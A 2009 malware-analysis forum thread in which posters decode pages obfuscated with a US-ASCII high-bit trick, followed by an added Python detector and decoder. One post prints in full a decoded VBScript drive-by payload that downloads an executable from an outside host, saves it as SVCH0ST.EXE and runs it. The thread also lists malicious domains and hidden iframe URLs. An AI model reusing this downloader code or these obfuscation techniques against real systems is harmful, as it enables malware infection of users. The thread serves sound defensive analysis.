Malware Domain List

Malware Related => Malware Analysis => Topic started by: JohnC on June 15, 2009, 08:23:27 pm

Title: Malicious code?
Post by: JohnC on June 15, 2009, 08:23:27 pm
masteranalyse.com/dark.htm

Code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>       
</head><body>
 㽰 轰 徊  轰 徊  轱 徊  轱 徊  轱 徊  轱 徊
</body></html>

http://www.virustotal.com/analisis/e46e839e5f3c57e3af507937af2a1b8dec90e23a70473e17bf53cd52c17827ee-1245097235
Title: Re: Malicious code?
Post by: MysteryFCM on June 15, 2009, 09:21:48 pm
Doesn't appear to be malicious?
Title: Re: Malicious code?
Post by: CkreM on June 15, 2009, 11:05:09 pm
looks like just some unidentified characters to me
Title: Re: Malicious code?
Post by: miyoko on June 16, 2009, 02:17:32 am
It's actually malicious code; it's got 6 iframes inside.

The method I use to decode it is to remove all the , host it and run it in a browser, and the iframes will show up.

in US-ASCII is <

Don't know if there's any easy way to decode it.
Title: Re: Malicious code?
Post by: CkreM on June 16, 2009, 02:33:40 am
It's actually malicious code; it's got 6 iframes inside.

The method I use to decode it is to remove all the , host it and run it in a browser, and the iframes will show up.

in US-ASCII is <

Don't know if there's any easy way to decode it.


nice :)
 
Code:
<iframe src=06014.htm width=0 height=0></iframe>
<iframe src=Ajax.htm width=0 height=0></iframe>
<iframe src=Pps.htm width=1 height=1></iframe>
<iframe src=Reader.htm width=1 height=1></iframe>
<iframe src=Storm.htm width=1 height=1></iframe>
<iframe src=Web.htm width=1 height=1></iframe>

masteranalyse.com/Ajax.htm
masteranalyse.com/Pps.htm
masteranalyse.com/Reader.htm
masteranalyse.com/Storm.htm
masteranalyse.com/Web.htm
masteranalyse.com/06014.htm

Need to decode each of them as well...
Title: Re: Malicious code?
Post by: MysteryFCM on June 16, 2009, 12:28:27 pm
Nice one miyoko, cheers :)
Title: Re: Malicious code?
Post by: SysAdMini on June 16, 2009, 03:00:11 pm
US-ASCII uses only 7 bits. The highest bit was set by the author purely for obfuscation.
The browser interprets the charset instruction correctly and ignores the highest bit.

You can decode it in Malzilla using this function:
Code:
// The obfuscated text from dark.htm; every byte has its high (8th) bit set
y = " 㽰 轰 徊 轰 徊 轱 徊 轱 徊 轱 徊 轱 徊";
for (i = 0; i < y.length; i++) {
    // 127 = 0x7F: mask off the high bit, leaving the original 7-bit ASCII code
    document.write(String.fromCharCode(127 & y.charCodeAt(i)));
}
Title: Re: Malicious code?
Post by: SysAdMini on June 17, 2009, 05:24:52 pm
I was wondering if it's a known issue.
It is. I've found a two-year-old article about it.

http://www.avertlabs.com/research/blog/index.php/2007/04/08/malware-exploits-microsoft-feature-along-with-vulnerabilities/

It seems that only IE is vulnerable.
Here is a test page to check your browser.

http://www.malwaredomainlist.com/test/7bits.htm
Title: Re: Malicious code?
Post by: MysteryFCM on June 17, 2009, 05:45:24 pm
Just loaded the test page in Avant with JS enabled, and then in IE8 itself, and no message box :)
Title: Re: Malicious code?
Post by: JohnC on June 17, 2009, 10:31:21 pm
I recall coming across something similar in the past, but didn't really know how it worked, and didn't bother to question it. But remembered it did have detections. The title of the page was normally something like "Super IE 0day".

8568985.com/garegky/egk.htm

Code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
 形   ս𺯯墍   ⢦墦㢦 ᢦ䢬 㢦󢦢颦Ĺõİâòųн͢㢦󢦢梦آ̢͢ȢԢТ   Ь ǢԢ լ 半䍊形֢ȢԮŢ֢ȢԮӢ   颦𢦢Ƣ颦墦墦Ϣ墦   ɮ򨲩ɮ婍ɮ󩍊䢍½䢦⢦󢦢墦潢Ӣ袦墦좦좦𢦢𢦢좦颦㢦ᢍͽ   ͬڮ影ڮڮ ڮ 嬲ڮ半ڮ彲ڮڮ    榢   㢢Ӣ좢榢Ӯ 妢榢   碍ڮ 󬲍ڮ半   榢 ᬢ
</body>
</html>

http://www.virustotal.com/analisis/de7da2635da6a92e843beea82101bdfcb9b1aecc48404f8be25f8211dd06c87b-1245277903
Title: Re: Malicious code?
Post by: philipp on June 26, 2009, 09:30:40 am
Code:
philipp@desktop:~/analysis$ curl -s http://8568985.com/garegky/egk.htm | perl -pe 'tr/\200-\377/\000-\177/'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.8568985.com/garegky/jpmm.exe"
Set A0 = document.createElement("ob"&"je"&"c"&"t")
A0.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = A0.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
Exe="SV"&"CH"&"0ST.EXE"
Vbs="SV"&"CH"&"OST.VBS"
Set FPI = A0.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
Exe=FPI.BuildPath(sTmp,Exe)
Vbs=FPI.BuildPath(sTmp,Vbs)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
fffff="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"
AdM=AA&AB
Set ZZ = A0.createobject(AdM,"")
ZZ.type=1
ZZ.Open
ZZ.Write Pop.ResponseBody
ZZ.Savetofile Exe,2
ZZ.Close
ZZ.Type=2
ZZ.Open
ZZ.WriteText "On Error Resume Next"&vbCrLf&"Set S = CreateObject(""Wsc""&""ript.S""&""hell"")"&vbCrLf&"S.Run ("""&Exe&""")"&vbCrLf&"Set S = Nothing"
ZZ.Savetofile Vbs,2
ZZ.Close
Set MircoLonga = A0.createobject(fffff&"tion","")
MircoLonga.ShellExecute Vbs,aaa,aaa,"Open",0
</Script>
</body>
</html>

edit: changed quote- to code-tags to disable links
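The following is an added example, not code from the thread or from any of the posters, that does offline what SysAdMini's Malzilla loop (127 & charCode) and philipp's perl one-liner (tr/\200-\377/\000-\177/) do by hand: it clears bit 7 of every byte, and adds the check an analyst wants first, namely whether a page that declares charset=US-ASCII contains any bytes with the high bit set at all (a 7-bit charset should never need them). The sample page is constructed here from the iframe markup miyoko recovered from dark.htm, re-encoded with the high bit set; the exact bytes of the original file are an assumption.

```python
"""Detect and undo the 7-bit/high-bit obfuscation discussed in this thread.

A page declared as charset=US-ASCII (a 7-bit encoding) sets the high bit
(0x80) on the bytes it wants to hide.  A browser that honours the declared
charset drops that bit; a raw view shows only "unidentified characters".
Clearing bit 7 on every byte (b & 0x7F) restores the original markup.
"""
import re

# Constructed sample: the markup miyoko recovered from dark.htm.  How the
# attacker's file encoded it byte for byte is an assumption made here so
# that the example runs offline.
HIDDEN_MARKUP = (
    '<iframe src=06014.htm width=0 height=0></iframe>'
    '<iframe src=Ajax.htm width=0 height=0></iframe>'
    '<iframe src=Pps.htm width=1 height=1></iframe>'
    '<iframe src=Reader.htm width=1 height=1></iframe>'
    '<iframe src=Storm.htm width=1 height=1></iframe>'
    '<iframe src=Web.htm width=1 height=1></iframe>'
)


def obfuscate_high_bit(text):
    """Set bit 7 on every byte of 7-bit ASCII text, as the attacker did."""
    return bytes(b | 0x80 for b in text.encode('ascii'))


# Constructed page: plain header declaring US-ASCII, obfuscated body.
SAMPLE_PAGE = (
    b'<html>\r\n<head>\r\n'
    b'<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />\r\n'
    b'<title></title>\r\n</head><body>\r\n'
    + obfuscate_high_bit(HIDDEN_MARKUP)
    + b'\r\n</body></html>\r\n'
)

CHARSET_RE = re.compile(rb'charset\s*=\s*"?([\w-]+)', re.IGNORECASE)
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*"?([^\s">]+)', re.IGNORECASE)


def declares_us_ascii(raw):
    m = CHARSET_RE.search(raw)
    return bool(m) and m.group(1).lower() == b'us-ascii'


def high_bit_bytes(raw):
    """Count bytes with bit 7 set; any such byte in a US-ASCII page is suspicious."""
    return sum(1 for b in raw if b & 0x80)


def strip_high_bit(raw):
    """Equivalent of perl tr/\\200-\\377/\\000-\\177/ and Malzilla's 127 & charCode."""
    return bytes(b & 0x7F for b in raw)


def extract_iframe_srcs(raw):
    """Decode the page and list the src of every iframe it contains."""
    decoded = strip_high_bit(raw).decode('ascii', errors='replace')
    return IFRAME_RE.findall(decoded)


def analyse(raw):
    """Flag the charset/high-bit mismatch and, if present, expose what it hides."""
    us_ascii = declares_us_ascii(raw)
    hidden = high_bit_bytes(raw)
    suspicious = us_ascii and hidden > 0
    return {
        'declares_us_ascii': us_ascii,
        'high_bit_bytes': hidden,
        'suspicious': suspicious,
        'iframes': extract_iframe_srcs(raw) if suspicious else [],
        'decoded': strip_high_bit(raw).decode('ascii', errors='replace') if suspicious else None,
    }


if __name__ == '__main__':
    report = analyse(SAMPLE_PAGE)
    print('declares US-ASCII:', report['declares_us_ascii'])
    print('bytes with high bit set:', report['high_bit_bytes'])
    print('suspicious:', report['suspicious'])
    for src in report['iframes']:
        print('hidden iframe ->', src)
```

The same masking works on egk.htm-style pages where the hidden part is a script rather than iframes; only the post-decode extraction differs. Run the decoded output through a viewer, never a browser, since the recovered markup is the live exploit page.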